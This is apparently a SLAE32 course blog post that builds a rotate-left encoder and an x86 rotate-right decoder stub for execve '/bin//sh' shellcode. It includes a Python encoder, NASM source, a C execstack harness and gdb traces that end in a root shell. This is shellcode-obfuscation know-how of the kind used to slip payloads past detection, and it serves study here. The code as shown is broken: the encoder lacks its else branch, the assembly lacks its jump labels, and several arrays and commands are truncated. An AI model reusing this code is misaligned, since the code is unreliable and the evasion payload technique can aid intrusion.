SLAE32 Assignment 4 - Rotation Encoder

11 minute read


For my fourth assignment in the SLAE32 course, I created a custom Rotation Encoder.

  • How this works is to encode the payload, it rotates every bit to the left by one.
    • If the greatest bit (valued 128) falls off the left, it wraps around to the lowest bit (valued 1).


  • To decode, all the bits are rotated to the right by one.
    • If there is a low bit, it is moved to the highest bit.


Encoding the Payload

The payload used for this example is the execve shellcode; provided in the SLAE course.

Grabbing the Payload Shellcode

Shellscript for automation

# Filename:
# Author:   boku
objdump -d $(pwd)/${1} | grep '[0-9a-f]:' | grep -v 'file'\
| cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' \
| sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s \
| sed 's/^/"/' | sed 's/$/"/g'
  • To quickly grab the hex from shellcode, I used the method shown in the SLAE course.
  • To make it easier, I added it to a shellscript.

Using the Script to get the Payload Shellcode

root@zed# ./ execve-stack 
  • Perfect. Now we will need to encode this shellcode using our Python Encoder

Encoding the Payload with the Encoder

Python Encoder

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
shellcode += "\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1"
shellcode += "\xb0\x0b\xcd\x80"
encoded1 = ""
encoded2 = ""
for x in bytearray(shellcode) :
    if x > 127:
        x = x - 128             # Remove the left-most bit
        x = x << 1              # Shift to the left 1
        x += 1                  # Add 1, to complete the rotate
        encoded1 += '\\x'
        encoded1 += '%02x' %x   # Add the rotated left hex to string 
        encoded2 += '0x'
        encoded2 += '%02x,' %x  # Add the rotated left hex to string 
        encoded1 += '\\x'       # No leftmost bit, just rotate
        encoded1 += '%02x' %(x << 1)
        encoded2 += '0x'        # No leftmost bit, just rotate
        encoded2 += '%02x,' %(x << 1)
print encoded1
print encoded2
print 'Len: %d' % len(bytearray(shellcode))
  • The new encoded shellcode is output in both the \x format and the 0x, format.
  • As you can see in the top section, all that needs to be done to change the shellcode payload is replace the string in the shellcode array.

Executing the Encoder

root# python

Len: 25
# Add 0xff to the end of the payload
  • Our encoded shellcode payload is 25 bytes.
  • We will need to add a final byte to the end 0xff.
    • This byte will be used by our decoder to let it know it has reached the end of our payload.
  • We will copy the second output with the 0x, format, to our nasm program after appending the byte.

Decoding the Payload

  • This assembly program will use the JMP|Call|POP technique to put the memory location of our encoded string into the ESI Register.
  • Once in the ESI Register, we will decode our payload byte-by-byte.

The Decoder

; Filename: rotateRightDecoder.nasm
; Author:   boku

global _start

section .text
  jmp short call_decoder ; 1. jump to where the shellcode string is

  pop esi                ; 3. Put string location in esi register

  ror byte [esi], 1      ; 4. decode the byte by bitwise rotate right
  cmp byte [esi], 0xFF   ; 5. Is this the last byte?
  je Shellcode           ;    - If so jump into the payload and execute
  inc esi                ; 6. Not end? Move forward 1 byte
  jmp short decode       ; 7. Lets decode the next byte
  call decoder           ; 2. Put the mem location of the string on the stack
  Shellcode: db 0x62,0x81,0xa0,0xd0,0x5e,0x5e,\
  • The instruction jmp short decode is an unconditional jump. We use this to create the loop to decode our shellcode.
  • ror byte [esi], 1
    • rotate to the right one bit, one byte at a time,
  • If the decoded byte is \xff then we will jump to the shellcode using the instruction je Shellcode.
  • If the byte is not \xff then the zero flag will not be set, and that jump will be ignored.
  • Now that both the decoder and encoder are created, the last thing to do is compile and test.

Testing the Decoder

Compiling Shellcode and Host Program

Compiling the Decoder

nasm -f elf32 rotateRightDecoder.nasm -o rotateRightDecoder.o
ld -o rotateRightDecoder rotateRightDecoder.o
  • To compile my Assembly code I used the NASM Compiler with these commands. After creating the object file with NASM, I linked the object file using ld.
  • Trying to run the decoder itself fails with a segmentation dump.
  • We will extract the hex code using the objdump cl-fu method above and inject it into a host program.

Extracting the Hex from the Decoder

root# objdump -d 4-rolDecoder | grep '[0-9a-f]:' | \
grep -v 'file'| cut -f2 -d: | cut -f1-6 -d' ' | \
tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | \
sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | \
sed 's/$/"/g' 
  • Now we will load this into our shellcode.c host program.

Shellcode.c Host Program


unsigned char code[] = \
        printf("Shellcode Length:  %d\n", strlen(code));
        int (*ret)() = (int(*)())code;
  • I tested the shellcode using the C program shown in the SLAE course.
  • After extracting the shellcode using the above bash script, I added it to the C program as the code[] array.

Compiling Host C Program

gcc -fno-stack-protector -z execstack -o shellcode shellcode.c

Analyzing with gdb

gdb setup

root# gdb ./shellcode
gdb-peda$ info variables
  0x0804a040  code
gdb-peda$ b *0x0804a040
  Breakpoint 1 at 0x804a040
gdb-peda$ run
# Current Instruction
=> 0x804a040 <code>:    jmp    0x804a04d <code+13>
  • Here we see the program being run with gdb.
  • A breakpoint was set for when the program starts to execute the instructions at the code[] array varaible.
  • We see that our program successfully stopped at the break-point.
  • After the jump we will do a call, which will load the memory address of our encoded execve program on to the top of the stack.

Stepping Through the Decoder with gdb

Decoder JMP|Call|POP

# Break-Point
# Jump
=> 0x804a040 <code>:    jmp    0x804a04d <code+13>

# step into with si
gdb-peda$ si
# Call
=> 0x804a04d <code+13>: call   0x804a042 <code+2>
# Pop
   0x804a042 <code+2>:  pop    esi
# Decode with Rotate Right
=> 0x804a043 <code+3>:  ror    BYTE PTR [esi],1
# Check end of encoded payload
   0x804a045 <code+5>:  cmp    BYTE PTR [esi],0xff
  • Here we can see our JMP|Call|POP instructions being executed.
    • This loads the address of our encoded payload into the esi register.
  • After decoding 1 byte we can see that our decoder checks to see if it is at the end.

Decode First Byte

# First Encoded Byte
gdb-peda$ x/c $esi
0x804a052 <code+18>:    0x62
# Instructions to Decode First Byte
   0x804a043 <code+3>:  ror    BYTE PTR [esi],1
=> 0x804a045 <code+5>:  cmp    BYTE PTR [esi],0xff
# First Decoded Byte
gdb-peda$ x/c $esi
0x804a052 <code+18>:    0x31
  • We see that our first byte encoded byte was successfully decoded.

Decoding all the Bytes

=> 0x804a048 <code+8>:  je     0x804a052 <code+18>
# JUMP is NOT taken
   0x804a04a <code+10>: inc    esi
=> 0x804a04b <code+11>: jmp    0x804a043 <code+3>
# JUMP is taken
  • To move to the next byte in our encoded payload string we use the instruction inc esi.
  • We go through this 26 more times until we reach the byte 0xff.

Finding the End of Payload

   0x804a043 <code+3>:  ror    BYTE PTR [esi],1
=> 0x804a045 <code+5>:  cmp    BYTE PTR [esi],0xff
=> 0x804a048 <code+8>:  je     0x804a052 <code+18>
# JUMP is taken
=> 0x804a052 <code+18>: xor    eax,eax
  • 0xff rotated either way, any amount of times, is always 0xff.
  • After reaching the final byte 0xff we jump into our decoded payload.

Injected Shellcode at time of Execve Payload Execution

EAX: 0xb ('\x0b')
EBX: 0xbffff500 ("/bin//sh")
ECX: 0xbffff4f8 --> 0xbffff500 ("/bin//sh")
EDX: 0xbffff4fc --> 0x0

=> 0x804a069 <code+41>: int    0x80
0000| 0xbffff4f8 --> 0xbffff500 ("/bin//sh")
0004| 0xbffff4fc --> 0x0
0008| 0xbffff500 ("/bin//sh")
0012| 0xbffff504 ("//sh")
0016| 0xbffff508 --> 0x0

# Execute the Execve 0x80 systemcall
gdb-peda$ si
process 27199 is executing new program: /bin/dash
# whoami
[New process 788]
process 788 is executing new program: /usr/bin/whoami
  • We see we successfully decoded and executed our execve payload.

Testing without gdb

root# ./shellcode
Shellcode Length:  44
# whoami
# id
uid=0(root) gid=0(root) groups=0(root)
  • Boom! Our decoded works!

SLAE32 Blog Proof

This blog post has been created for completing the requirements
 of the SecurityTube Linux Assembly Expert certification:
	- Now at:
SLAE/Student ID: PA-10913
